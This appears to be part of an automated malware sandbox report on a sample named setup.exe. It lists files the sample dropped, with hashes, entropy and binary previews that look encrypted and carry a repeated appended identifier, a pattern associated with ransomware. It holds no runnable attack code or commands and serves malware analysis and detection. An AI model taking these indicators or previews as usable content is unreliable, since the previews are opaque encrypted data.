              Preview:<?xml..7l..................kq.b...7.{P..Uzw8...jlpx.|pn..lG...J;.......{...jVB..X.....k.a.{(..g..J;|.K:..Y.@.......}..a...Ai.Gz....2..L..S...V...C$..w..6..`.Z9f..D6y.F.s.}"J.C....P"!#p.R...W.$.O.|....s.<?N.d+.-....{...c.w..<.....0!sVI0j@..*.Y......w... .,..j.c.S.O..Dn.XV..j.....L.L.c..+..s.o9.kh+.B<.d.}..h.G....~..X}(.....d..h.{.b..c....NiI.$.-Z.I.u.hER_]m/9o7'.B.F.8.N...~.1X5l..!&;."..q!.s.)b8...l^B.nBR..V}.|..p1.\...VP.<....}$..V..Q.j...G...(..TvD.V~JV..qs..9..)...A.=..:.p..!.).............<..........S...z...\...>.5....k.wL.c.....$+........(..Z........8....p7.9..Z.0..$k". .....W<.. ...%..B.1e.O.B..H....zLt.B...+C5`.Sy..d.M.No...}.m.L.t......_....Q.....\jO.XK....g).i,V.F.s......_>..O..P.N.M\>......pA..D..8<.vv9q.R.%{VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):6314
              Entropy (8bit):7.967892189708212
              Encrypted:false
              SSDEEP:96:MZ//KSz1aQFvsFUAbsmiFl4mzcX+MzU+Eyq/N+hKq1NtbEQL7YOCLX2:MZ//9a1F1bsmGz0NzU+EJ/NI1DEQLxz
              MD5:16CBD230E966C621766C3D1A791148BE
              SHA1:8C6AA81F815D20ECFE1222BB7DF7A56A9EF4B26D
              SHA-256:C506E8F3227DD077773163589FB90E8337FEEE64133A949C0CBA71A71769FBC9
              SHA-512:D9721E391B5DA43A5CE2D042B27CAAA41D73739A1B864E0D9AF0D929E1309B9A659929B5C5E684405F9F9570933DA465D549A541091004BF5FD6DAB69DDB8047
              Malicious:false
              Preview:<?xmlY..^;C_.?.H..x..$.O.Jxh ..O`.cJ....-&....mU~=x..Q.U.m.=.o.U.JN.l...HO.'Im..8.<..7k.^..6.._.........f....'.-}u..B..u.u..?!.....w....f2..cD.....}:.iT.R....a.Mw.....F.-...A`.UW.'L...5.y....Kd.Ge.T......L.6..\......f.....p...,}.....q-..5.g..@R.../\.,'x.c......D.<.....:.h{.:.5Wa8R.@..)..e.S..B5......Bl/]S!.........zo5..VR..*g`.C5..t.5...s"-.V....ru..._^8.......q~:.v<......4za.n`......o.h.=?....%......!...hX}...\.mD......U.._ ......zZ..'.^p9H...<8./J...U.~..7...8.B...B/..Tr.[...=...*...x..o...h.a.P.H..R..U..'.[....`..Y!...#.^#...A......t4.+Y..i;..:^..=....{u"..0.^.Z..g..6?..'...3....l.g.....FEW._m.L.O!....j|6C...*.I...L..EZ..(.|....T.y..&.....SRy.(....o.cM.Lyu{..U.......:.#Q.}...&.<...@....'.,.d.`:...Ok.....{.............3.{C.`@.wU....=%.=......I..-.A.....b..v=._s....=p#+1.<.5|Am..G_X.[.....[I...J.h.:\>~.._.p...........ndYK..|.._....3'...... %..CZy....*..ju.....l..c6.0....O.(.\.....@n.%Ui.b.d..6.G..U.T.#....x.........7q%8+.&.&..F,.P.m..>
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1029
              Entropy (8bit):7.809405323642127
              Encrypted:false
              SSDEEP:24:sHab/jxXoY2u8GnuOYBoa5wGLzKSMRA6LA2QkzxqIAWbD:sH0cVGnuOYBuGLWSADLqkdqIVD
              MD5:1F7E5417E0DCE5B469E165810ED998D2
              SHA1:9637F16D1ADAD4A35E46ED7CDB004BB2FB659FF9
              SHA-256:7DC2D5BAB853FF6A56E4B0318C68F1F3337CF9C10D500A6428C5F1625F92E0EE
              SHA-512:199CBBB60C8BB98CE2F0B8815DA5DEA6F7609105E088AE3D3DF14064569599D4170544E1C1D9A310DF168711DC1D8E6ACF3A658CE45B54937FD9B38E52AB847C
              Malicious:false
              Preview:<?xml..9...x~29w[(...[._E~.g{eZ..;..<#...8..d...-...st..3....=e.......d<.&...F.....q.....v6...V.J.J..F.....#..%........S.z...gd}..R.WK.S..$.T..z...a\~g..*.|n.J=...N?.H..jzn.=s.V..^{..X'{.o.=7.n.m....t...+x.8". &F6S...{[.X.H....g..(.........c.^..<;U.gz....T....]..~.r...)Lv...`?QGf.y..J..5...XOeg.'.yK.>5.ch.e....g..x.."7...kE.e.>N...%.3.n..8zK.......S%. .K..'...TW.y...G~ c....a`.`.>.`).>.....F.y..ufM..I.F.o.0sn.........~(.....:.s...ZN....K.K.%C..5.9......4...U:]Ye..?.".k.$f.....[..i....D..c...tq...`.z`..P....saZ.NtV....Q.@_.b.w..-_..,.s..r..].q....N..5..<.I.........b....9?(U.,H...N....z%../j....w!.!...;A.P..F.[K..d..!.M.2..#M@..|...Q.h....~<,<[u...t{....QXu......1.I).....zsP.q...$..........O.R..|56(.Op..S..W.O........)Q|b.0}@......J.s.V.M..!L.....p...9.W..C...Xx^..8."w....x..~.y.c$..'].^.{.......2..f..U.....{.?x..>..Yt.C.H.K.X.<.sH ..=.#.` ......[-a.....o.....h.....i._......o<...X.{...#...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1040
              Entropy (8bit):7.802443888853122
              Encrypted:false
              SSDEEP:24:7aTX9uyUGwYGnOz1OFtVAsYplVYNLtsz5PxzTmYbD:YtuyU0G4OXOlV2LqVZWCD
              MD5:BA2619B462A1DE9CDB51DEC53CCFD2F0
              SHA1:450F3F521D712D922F4464EF797B20EC57DA9D47
              SHA-256:36A2E8A6555E7B6036DD96B0F6F1741D7539DDBA6CC5A7FFF7511E65BA89B270
              SHA-512:F11E74DB14C8700EEC7CB559B3F4CC52BEDCDB282C249131E7B79ED005B8D50A7903FEE1CE697DC09AC0860ED34A8628399E4E6FF09CD524965C4CE9AAA5BA7C
              Malicious:false
              Preview:<?xml..uC.%.V_..Q...#...N...MY...J....m.......:p.>..{.l..@....^..b.1.....}..LG~......#xR.=1..n..eD........>.c..8?U....P....s.@.Z...nh:..a0~,l..0..q.A.)&q..p?p.O..-.b.......Y*g.M..R...^nN...v.;z.g.,m .o.22..F.N.p#X....(..."...r..q(.Qe......r).=..r.d..'.}...0.^}.:v_...T.,.f.#.V....Q.JQ.d.P...0..~..g..4.'$v.....Y.\....H>W.v...z.%....j....h....Yi.Y.$t.}.0.rh..E../..+./..j....Y..k.i.~..i.}.K............Ef....|..pE.&.._..mA...hD.:........:.Y....zQ...T9..p..F"K...O.S(*.]}...w=.$..K)....!..-[6...I&J....^.%(an9w#.'D.A"..%.Q..?..:C..s..3.>.....U.>....0[...v[...y.h.f<......f...C.$j:=....]y...[.\.~..._.?FV1.u.: |.A.."..a........`.vJ.W.(.._.UWHd.Q..,q.Q.....6v....Q.@.a...X.z.jO..R.K;. +.yo&.#.Q..t...3....x.v...G....;bO....u.+....Bs..7.A.$.O.:-.W..hQP:.....F.-..6o:..d.......c.........x...N.V...g..;..1..1y.E..Zov..B..Z........;..<......S..3.Gd..-...:..9g.0t....U.xLUl..[.U..|j2..HzDlCv.$..i.E.L...P.".}_.[.Lq.."VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnH
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1415
              Entropy (8bit):7.866118159375637
              Encrypted:false
              SSDEEP:24:aWs7dCTydY278nTYXW5VI+w+yvcarJ88dOhhD5rpZhS7esKiuzykVicb+LVKg7X5:aWisVYg1wdW8dOhh134egpkVicyDuXkD
              MD5:0D289EED5B951E5A10A35206D49428CD
              SHA1:A1725588AA3D2A56A7DD8110769BB5A9B2C5C08B
              SHA-256:5FB4D6DF42C3C5E1D10172B34746AEDFAE512185B3E827A4C230AA099D8D9788
              SHA-512:3AD63A7CBFD7DF2DE9EBDD76F35E067DEC2CA7EE63AF6294B4E7F0D7810D657E836E9744412363D20887275ED392B70F755073393E7834515536DD2C04A3DDC0
              Malicious:false
              Preview:<?xml...*_.7..Z.;jP.oO.....z.3..c .....A.1\{e.n4.......<...k.,h.F+..ei....Y.......B.,i..B...S../b..ia<K..S.I..PV..._.b.. ..,.b/1...O!oi.t............]..s.GM.........i.e..|.y..l..k..A._.........,.V2..LX....^....U....S....3|wUp+4.)...J...j...b...^|;w.Q....6.eW..K..D.._..j......C.3....].0J..._......|.4*[.w.H2q.UK..BH.+...1...)(..7..fv.....{a.f.:H...........@.}.DM..n.#..h3Kl......B@.."Q. .{*.....m...ze.`*.PA('-...su.......I..!..bC.{.zx.....x......,b.I6..&...n...Eo.y..My.=..M.m.. ".........7P.C.F .>m..#.H.H\*....F..jI.......[N.EB".Z.-L...9./>.k..A&..c...]...C.}@.o..3.a*OY..).I........w......|.......DZ_.4.......xE..Tb.c.7&tm.[...c._v..G....w^....u.'Qx.+...<..e.....*.t.c.U~.~..f..2..%)...)c8...&..{...Ra...Z...Y...E....|....RS....'.J..oX.d...~7..}[....bG.P.X..r-C.\-<.i(.+H..4...Qi..|C........^-lZ8.@....`e|'..!R..L.L..t|....1...G...M...6.>..H.{@2..8...$?"Tn.e?...&76.!....A..\..2.?."a(.?`.....I.m/G....F.^..X...,.\./j.."x...=......cf6.......4..j.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1073
              Entropy (8bit):7.827784489936183
              Encrypted:false
              SSDEEP:24:RvVyaA+UW97M+Ozd06R7i+mFkcv6Q/HL5CYbD:r2474dmFkcSMLRD
              MD5:83B38E37C7D1B40CF974BFFD333DDF3D
              SHA1:087561563AEDD7E4B17E0F20573035F779EF45DF
              SHA-256:0D32CC61AAEAD0A1059B2D921345EFA75E50EAD62E0D808A1141CD6DF9326EFC
              SHA-512:830C22889167F6AE3D5417E54A0670E27904FC21B4A7032FFEED5C9E987789926091C93EFD7CE936D1FD269E8CC9220EDD473C716DECFDDED17F24EF411E8BC3
              Malicious:false
              Preview:<?xml(6..]......n.t........e.Rk._...=..h6y.z.}.3..%.tIp...q...>.}'....m.=.}>..q!...F.....MQ...9...".;c|.a.Zi.|.H5.v....6W..W..+ch...f.%.,.5].HK....y..%....:....~T.6+...>...,v...M,..K......:..l.........AB..l...O...W..S..N=q....&.,...........b.y...?.U..&.x........R)..9..8.A.....C4..;....Y..e..:.k.pg..`.T.6s1<U.~..HY.X. r<v..!X.Oo..Y.w...I..^.O ..Q...6...MM..........7.....4.\.E6.Y&)b.B/..;&.f... .wZ].1.i....m.....h..|r[wU..........PL.NK..f.9).#.j.e...PY......G.Iz.^........P.2.../...I0......\.R..A7o.'...._.....%...j9..~.Y.k..=.Q).O...t....l....h...I1..>.....p..<<..;Zf+....-..K...b*............5 .g..C...`...O0s....q<.0.Mf.....08.....i}D>.b.X......\g&?5.W|Y..^....x..AH....g.nL....k.#?.f...:cn...F_..A.=Z..z.Og....W.W..K.n.Dy...k.Z!Nq.A3..~..s......=h...?.d.y.?<.s.../....%.(05.t......4....4Wm..y.y....Y.L]T..j3.U..j.>.....4..z.....2j..k.`......6.L,.X.t....sj..........iY.uL...J..[.K*.q.m6..."..[.?^I.@A..q./.%L.S....r..."....J(.g..SQc.\$...VrBq0
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1154
              Entropy (8bit):7.824392748293812
              Encrypted:false
              SSDEEP:24:jgSEXO1h2pYfz/c69evsxhGH07Jzt99r3YDtdtgqXoR/roEWbD:jgSEXOeIj9evsfRFt99rI53gKEED
              MD5:B8C0A8B7692B837B24C3307C42017B1B
              SHA1:3C08F90C9F6F94E2962AA0D425D12F53E6C34E47
              SHA-256:0B9CAB2652CD7FBBFB2DAA8B79FCD7C694BC2E85E0FC01640D9188E43DAE310A
              SHA-512:B4678CE1C7588263D97FEEC9A4E393C570A91DC332BAE6B1721EA035B4FBB4347DE9BCBD2B8682D151945D2BD5B46954000067A952E82F76F694B4A2B8132D39
              Malicious:false
              Preview:<?xml...d.......5.../v.EJ.n..3... a..._.....p..&..-}............8.;E....(.._.*i.%..)...3...,..Y.1.1<.+..sLm..+...=..F..j..d.DnW6..r..yrx.[.]=.r..+.*.../?.ta.......`v.....p....a...W...............x.i~...x...W.....c..5.jB.!1E...]..*............L.,M.7.q.K....+...}..SL|w$.....h\..Am............A...}dM..o.x.*Lw..^.[..y[.U.8y?...L3<.S[.xO.-+....{3...-...t...v..'..:.+.AM.TA.w.iv..Z.....!.....~.....!P2..1..JX|.RV...!.q......_.\7=....F.hb0...N..r....8..rg.m.@...e._..%|..GWZ{`er....\?bx...\/{.o.d..'T..o.UP|..I...VI.-.../..oA|.b....[F.Ld..K...|...A;9c.w.....Ob.7....3.Y...j.3..EQW.........l....l.....K.Z.v..c".....0y... Se...Z.X.?<.W.....;.\..!...#s".o.<R...Y...!.WU-.m.......1 ......ds.P[6.e...5 .Q.q....N..2.$.S.G.HyR3.2.P.b._.]........p.T.%....5.~g.8(.&...R0. .e.........+...h~.i..G..?W..0....."6.0a..u.k.3.b..j.I.]8... ]..F..Et........./.......pIC..fL.ZF#.....L..x_..%...N.Y./.\q.x..!..\..F...2....f.#.."]...[OXN.yRe*..........H.G.P..e..N......}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1902
              Entropy (8bit):7.907510971313485
              Encrypted:false
              SSDEEP:48:wusxMR1lFehe5LLfdIcFL6Xa+fpf5D4CTkDAxUD:wub4aLLfdh6J/DzkDKA
              MD5:900B35E018359A04B3927F9C10169FCE
              SHA1:CD70C77D1856E47AE34A21F81EB2110FD16175EA
              SHA-256:E43F25EB3852A2FCFD13496FA2DBEF82D012599117E455BA3699A8F72FB25B2A
              SHA-512:1B40F8B881922C8D627F30B09732527E0867E06C4FF718844022F063D2264931DB7716A0AC5E0C15F5CA7924DA1B9BA9AF7A72E42DE49C9711EB768EA5663C76
              Malicious:false
              Preview:<?xmlM........p.T.....).r...H.U..W......k.B7|y........|..#!j*T.C&?..B.....M.lU\.....y>.r>.g[.eO...u.....M.X..f{\m...".....B.x^.{T:...T...1...yD4U.:...~4....q.L...HrW?e....MtT.B....c....Q...l.h.^.!.92...x$....+.}&w_q.r.QUC6.:.._l.Q*V.8..+I...p&5.....w...T...(...f....`......Z.=.....rI+...m.=J...]g.t.......,.n......2.......e..Y.h....64...m=$..R. ....U.fi.......Fl....X..a]...w\..=.s.U....'M]...sk........7...w..k$.6B.6..\}|k~<.[......[...bh.Xp...Gwv...t.*A...}.w...du......\...~.....b51..bpE..@.F.2...|.04.bSJ......@..G....~._(.PE...#~.t.ARW..>....3.i.y...h.c,.mU..9..;G.CO...M.i.;..Z."...#-.k..8].*L.u7..<.=S'....6..cV.}<.r%....D...,..{.}.YI...ap$+...a7..H..)U..y......s..H..X...^.M....h......m.^..wT.4.e.<.?...{..$....(..J-.v....J=.g.....?...$.c.t..7.........I.(..AF...&E.dB@p....yR.V.s......c-v.I}..%WD.S.{h.p..j..vR.2.jG.az.-.U..V..%Z..e..wW..OQ0Es2........_... ....)%....?..Q...Z.\.!:...=h..h......K......8]*...n..?,..0..a...4.xD7..>p^....n.N~..Y.9..z
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):712
              Entropy (8bit):7.673618642537811
              Encrypted:false
              SSDEEP:12:5tDDTkuAqyeoNLjLJgyUOVRGtOKsxLioQ/Jos4gsL8+N3ksMR2cii9a:TTknqye+jx7u3ePn93tbD
              MD5:4F05DEA86F61722FFAEF4F20A14D1D9B
              SHA1:9F8C692FC4A0BC7C2E4CC3EF632362991AF74A75
              SHA-256:8688DF780929896410F6FADCF7022A821D86B0AB4C020A3B403670C14513E4E7
              SHA-512:680154AAFD5F9CDA15783574E91491B4E6DB3E65CA9BE0BD03772AE7C57AACFCE38BE2E251747676028417F168395442D01EBCEE09CD58228CD7FF0107F135CC
              Malicious:false
              Preview:<?xml,.....b.<.x5..@M....XO..1n.!>..n.O..[...&.~H.....:..;.SP.[.H`(d..Cgx....P8.N.(...+}..8...@..yo^.*@Mo...<r..W.$....4\.g..I.K..... ..r/.5........Q..j.'..v.+...6.f..2V..6vifL`U.....~...........BVU.q.#$0./........HkQ..$Fw....j7U.c8=$...U.-..d.C.Dcd..~,.a.."6o;.#S.._......TR..;Y.!b..r.cl5.^....s....Z.+Z.!.L-..........|.U....q..y..Mu.d..t..v!..d.Q.n.n^@$....HO.......s.....4Z.I`rl.H.[.KRM.$....VN...s..4,.J.:c..bQ.\../>.$0l...=&x.i.K.l..I.......2..Q..,e{.T...U...8.J.Y.N..bV....e..U.......J.1..`..L,....._.K.o,kX:.1n.3<s...5.G.UL.n.5a.J...*...3......}.8^A.y.W...l....xU.s%v...D.0'+...~...A...U\.%.k`..D.Z^BVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1707
              Entropy (8bit):7.884300773139131
              Encrypted:false
              SSDEEP:24:622LxSlJVBHZXpSnQl8xYfk+3tiuccGLDmFkaOohRKILUMf5B0ub/Ei87gbD:j2LolHsO8CffaokBWRhLUg52cEig6D
              MD5:8AF2DA7CD40F63BE36E0C8F672F506EB
              SHA1:F3886BE1CD56A71FC8838226838F0D316EA93CCA
              SHA-256:75C1E333E2E971689AB347BC6F8BB9DEA200FAEB793F72F9C3545FC3E22A5C44
              SHA-512:0A2E4674190910F3E3A8568A9EF7A9B8A48D38E3657D31544448C4778606D7FEE93FCC7EE9D10583AE94A419C9D72CB8D13FF2C9F6D1D8CEB657344884EDC8E6
              Malicious:false
              Preview:<?xml.>...B%.`V....J..9...`......J..`6.i8.._.M.?._.|.C....>(..Fo...T.Nk......T..x.K.....`......o...H_V.....p*...l..0.F;.&,Y....R....;.wJu*....in&@@W\O..7...A{.@=9y*M.;..!@+..s...U...P.q.....}`.qv..=.G......'b..WS.V.O......?.....2.`.?E..".W.A.'c..@*.D.!...6.. ...k...q..X.9&...I.i?.)g.*..Y..y....in...VX.riy....~3......X.(W..+.....<.......TR.....^e..P.k....9...Mf8.+.M.+.-9Ip|..+..u......&.......Tz'.;...5N.zM.'.ygh..a\.$x...|yi.v.w.0.-.....P...4..4..U~......T.../....Y.{lP..}...z..X......<..........7l:.a...S...4GR.....3.@.s..$`,O...z..6..o...v...8H&...xy...9UW..1.@...7......l.$1..2tB...e.../*_...E%. ._W...&m...8`.i$.\z.h.Y2..*.6.Z..4Z.].S..W...*.....vF".......-.-.L.n..[.7z...6Y.z.Dk.>m.M/"<}.......~=.+.".p4hw.o.M...).G.D......i.o.-....s.*.S.l)nY..uYi.J......2`..QCh.........W.l...A.u.z0....od.lj!.&7..q...7.....".... 3.n...p....s.].`r.I....r.../(.k!.4..<..9N--.,1fn>..l.eXo!.....b.{...4.. ......I...S../...................../././.zj.....A.......<j
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2111
              Entropy (8bit):7.904937766482895
              Encrypted:false
              SSDEEP:48:HdEuyUMH/rSsr4xngfuy025g6uK6cKFr8j97WHQYzv5Qk3aM1C9kkIKQD:HdEflr/rygmyPN6Fucwyke
              MD5:6143919971F807485ED5D2C004FD9E2B
              SHA1:ADB5DDA38E099A586434F4BDD9FE450D8EAB59CD
              SHA-256:589EFF0F34BAB0093E150A6F7B454990CAD4FA960F536CE18189EEE6522BE7C5
              SHA-512:5C471240B7553B3AA6118473376741328A033571E10B5D0F5C1406E1041D005FDD769B19BE569D48CD96F3A0EA4B5034FC71A8E9451022D7F4105AFD43646004
              Malicious:false
              Preview:<?xmlf..N..z.wu...:Bcv....U.~.?..$..m.K......8|.D.pB.p...Q.T.._.0...r....<..t.D......fU.`[..IR...N....x.P|I&.t...1x.g..=.t..>.....r....R..}h\.6I....V6........!......7v...F..J..gFQz.V,..'.../...a.%"..&.Y.6":%'.......Y.y ..h....:n..!....d....*z...~....N.....u...B.........B....-..."............xJ. ..K.<......k.rC..j(4.<uY}......H.z.Lt../.b`.B.@..2..P...5UZ...2j..$..:L....><.j.Qs.rK! .........<sG...._f...}..r.cJ.F...+:..&'.+..v.3.HM"z."E...d.aJ.,...).}\.#....K....@.I..b6.L.'.H...@9.b.....!.......<...x..?...D9-.3....'..k2..V7>........+.zX..|..FQ...Y.#.G..n.....b@.".U.......l`....D.....?.l3...p..b.....1\.q.]....t.....l..nO{S.D......r>...'#9.Rs.'h.W..N7.....a......0..84......9H\..1..b...S..."#.67.'.....o..(.....5.y.&.]V.u...~=.@.3tJj|.I-.ed*.kFC.'..p.<EV....tNX...O......&y..v]..3.....p.AEWwL...C...R.@E%.`.f.kX.)..Q/....7......z..s..[..e....68.3.....^...!.g^.y.6[.!.4E....=tD.-J.y&$%..D"....4...SY..+..&.....$........'.Mb:..M.5.u.. M...X...r_>.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.884769617302137
              Encrypted:false
              SSDEEP:48:Seqmjl3Jt8s5KTQJ//vPiw7FtQ/FhxZwD:nvjGNQRi6qls
              MD5:4D28A2DBF5ED2F87A45BDC082BF23022
              SHA1:061C8C903EB12719B0B8FE5C3882097930E8038F
              SHA-256:877D6B309CB0E01A267BDFE641D25B2DDF88913D33AFF1C8F8EFED236130B55C
              SHA-512:06F462FA49239D805374C5707CCB55420B90083E49AFA17243B0D4B5EA6933CE1CC104C4EBFEE480CD7340B71F71CEDC959EF09DA5DD6447584E4D70D6026800
              Malicious:false
              Preview:<?xmlU.3....-.u.jTY7!.........6.@.'...AN..<..`.<>..d..........3..I..&W...C74.H..b(%.D..`...k.3BM.4.].].E/.N@.pa2...kY...!..b.c>d..LX..a...j......A.;..P..eM..7....1...w.u...,....i...M.b.2.(4.+ce.d..\....<..~.....q..P..b.4...S)..c....WDq{.......tC....z&+.A.S.&6........9o&.$.Q)....H..!#.I ..%...w?r...3._...(..Q..r/..S.K.Hm.9.W.".4g...pI.6.....Fs..-..2c...i..R....!........&...p.YQ.Y.;..(0xEw....y..!..S%..?.j..+xO2..2%\..M\;...#.4$g=O..M......8.xp.+...&....qt...........`3^.l..jv-.e.....d%hq..3.fc.........%.cq^....u...&-j:.H...Tg7......W.....p...'`.."..j.. w.. ...."^...Y..x.....{.6u...!..J..............vf.y.CB.....jd../E.W.h;.......<8...*.Z...... ..WrH....O.k*$.q...'+GDJ..E..E..5.......)...YN.]]...l............o'..q....p.#.H[w......]..Z...+s.i.+..x."C,m..;<f:9-..V...]..m....QC/.T..5..W.......nH...X....`u.T........&.:."O.....<.......Em...........\.l4.BD.VOXX....n.a|@.=@.g..Z.)+~g.;U.A......J.NE0(..T;EQG..)..k{...ZF..g..$Y..9.AR...i..:;u....)-%.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):935
              Entropy (8bit):7.765332230431937
              Encrypted:false
              SSDEEP:24:r7MJjnEuokmRHwrb9p+BKE05RiVqSjbI8EkUCVRbD:rS2HybKJH8yI8tLD
              MD5:861E04782216854DF6031C258CB96BF6
              SHA1:526C36DD9D0EF15E7905A80A41548150330CB97F
              SHA-256:5430285F31B5EB719517F6387ACBCF2CE17715461EC2549055C606B6EACA2036
              SHA-512:3F53B7A7F1E1DDDEF54B264CBCFD030EBF4AEF6FB68D1DB6A3DA9AF781C0D1C518D4C5886D15B8405F327BBF1508E59F70AEE2D813E135ADEFD716B38FFAA1DD
              Malicious:false
              Preview:<?xml)....{...._.rr..."..Ix...R.Q...Q.(..+bt.{.R..Z..fg%..<..&.l..1G.4P..r.....dp...U~J..s.S.2...N...:7f...wp...D.u....F..T~....cR.I.ri.O...\....Ic.3..uP..s.....}..H..44..............X.Z..HP..=f.".E.4i..0.l..s^...;B.f.4..5..(....j...Y..2......r|...5L...........pV..s........RY<...^....F6.&$9..s..j8.J(..d..s.,Um..\.Y3.K.#..wS..dx.........4......Cy.^<n.e..6.t..e.g....3.cuP...Q.(........>.6.(..*.......Bx.o..m].......0.c|......4.s.N....W".iS~'1...Z.}.,.C.f4(.m.$.3./..p].z_....|./P.LE3.0.....<..l.....".......N..!.|.{....%..z...G....?r......lo.Sr....kG."._.;m.`..=[..I..q.X..).pJ.^b-p7._.^..._s...:...`.U..5z.9L..W.y]..".............}......Tc......x]....3...D..mvS7).(N...:..R....P....M<."..CQS....<..'x(.~...;-.....b`x3....q...(X...O.<7..f....*.m.GBt2.u.IqH.}.qzc.g.sX.:..M...N....Z.7m....e..nM*z.[.`.#.r....=#.'\l.<?+....,.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):980
              Entropy (8bit):7.769551999233222
              Encrypted:false
              SSDEEP:24:VgisCXg0vd6Rbe6hnasQI7fQuQRKA7lfSxLAbD:+0vd6Rbe6YsQITpQf7RSAD
              MD5:A486EB69334F034771662697A7DEF67C
              SHA1:D680AC5133963EE677524BDFF560A017EB854D14
              SHA-256:F37EE290566D5B5BB9FCEA393E34856CAFA3073AD7824AA897012966FCD8DCDB
              SHA-512:28A7FEFE57EEA877676D9DD8A200D00C56F230A50B8A42EF7B05E2D43019F739B8A35637D98ADC559C3D3912D843E8C31CE31D3CDA73D1792BC8A348260FAA08
              Malicious:false
              Preview:<?xml.fT...:#..bPr.`..3[z+.&..e...E...'.|i..@H...C...r....m.W.(....-XzN.wP'.QX...#.[.-(..Y...`...m..V.E.t...]6..Qt..&...He..f.!..0$bI.=..F..=.......W2s..1A...n._>.f. ......^....>&.T.1...b6.S.O+..eJ...S.^..-..EAt...~.fO%G$.n.P...._s.%~..z.n(.O.{A........8.+....(..1a8...Xh31.4@.....K.Do>u.U]$.E.e,.}...Xfm......m4...].$oK..m.x.....).....P....c.b6.Z.....l..;+...r.j.....s...6....Z.....-(ly.C.0"bPmM...Q7.~0........<..-...`|......E.B..=.J8c..X%....K.32%....mqK.b...v$8~.+..i...g..lfB.l..T&.R`.^8~Q..w....v..l..os..3d..'..se,..4}...Y...MNKeS..$h....\.E|=..N..4./...(...0;.@L.S"Q.an...#.........|>.zO..................q....\>.{...B_..F.').Q..U*l.._q.u*..`...K.......j.0.b..J.r...}js.:LJ?o+.t.D...q..h...../3..8=.Zt....i..$...Xs.HG.....E......"........I.X...........Y$....[.2.......t.9..j..".U-g....:{..h.......1...N.t.F.0..%t/.6...)E..J."9.E.y.$.._{P.&.......ip..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2312
              Entropy (8bit):7.912433681741092
              Encrypted:false
              SSDEEP:48:MTDaHfS3khQzFOQORVMG9ll9/rS+A+dsCDDjuUpOJMWItJvF4RsdxMCD:MKH0khmFOQYMOl9rS+bDjuEmKv+ezMK
              MD5:DC60C1BA840BD1C64BDE23EFD0C217A2
              SHA1:100833DC2291A5C12F274EA8CA34B3FC89F0F394
              SHA-256:0D46CD0018C301ABF140EAC66A14AC78ECF3C1C2E0F56F5CCBD1EE7E29C748D0
              SHA-512:D4180BF9535FF4DFFF04D3D6CDD1C58A2267C88E6C36DA36FCBA6805766781415CB112034CCC6319413580A0A59D0BB51EF82DE0724E508EEE73C8BCAB2C2BFA
              Malicious:false
              Preview:<?xmlRjY..e..&....M*l!ZM3c,B....cgXJ...S......0a,...8.g.i?W.D..o....:9,,l...D..O.ZP.J.i.#......Ew*Hv..c..F.v(.t...O.p..s_).....%c..$.J..O..,..(.....<..h..Yi.L._.[.5....3-7G.5...u....h ..M...../....f.:.=.s....t.x......b.^...)..r.e....s.Ki..C...R...(..6a..Ss....z...._b,.F.7...Q(..&.O.N.Kz.T...dpp..>..`.......'t.fK.G........2.....a...]....T(.Zq( .?...%..S.l.H..~9~..Y.....f....`<...8.t1.C#...Z.x.W7`';$....tSSi.YyEym...K...%.)=...{h:...Q2~...-. ...8(..k.7..."..;.E...@...d..A..iCn..8.y{&......n.n..%_..3.-B_.bZ}.:e?t(...d.jj;tz.a\}.%.6k...U+D_S........x..w.QD...1....t3.......h....[.+z.N..a.h..I.i....%Z.Q.....%.N.j>z.2.|.....r]..v.p./)Kk...@t.^Do....Rs.y...S.Ia.6.%,EL.j.!..c..{9tu...P...#..U(........+.-.....`.2...ry:p_.s.R..:.H....rR.....Q..k.^;.T......,..$....v.W.VQ.9/...;h..j.mh6'vS.Z..m(dx..{^W.*.l....W...h[.Z.{.....O...)7..m..-.......[g.$\....(.....R.&"o......nM?-z...U.7sK..)Y*..!..B..-...@../..........1......+..3Wu.l.o..%$:..@e6.&vV.G...x.V........J+l#.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1731
              Entropy (8bit):7.8870928192982905
              Encrypted:false
              SSDEEP:48:xUJcJd5kOub8r6o7tR5inJFU2YGVhOJf9bLQ8LlZD:xUWD5kOub6Pt/2Jif9PQ8n
              MD5:0B0A953A691B224F98342CB25EB3C148
              SHA1:697108E4B96756C11778C303A85BEA25E189B9F6
              SHA-256:AB0B14A34EA0064038B65F11483039BA42170BD5661D0EE00EB54BFC79071368
              SHA-512:942126076FB2A00131F48F066233CBF20169E7A8C4EF38210519DE06F3A98265A1D0CD6886F98B5AEDE45D600AE32119BA56DAA4A503E7180FAC05923EF1116C
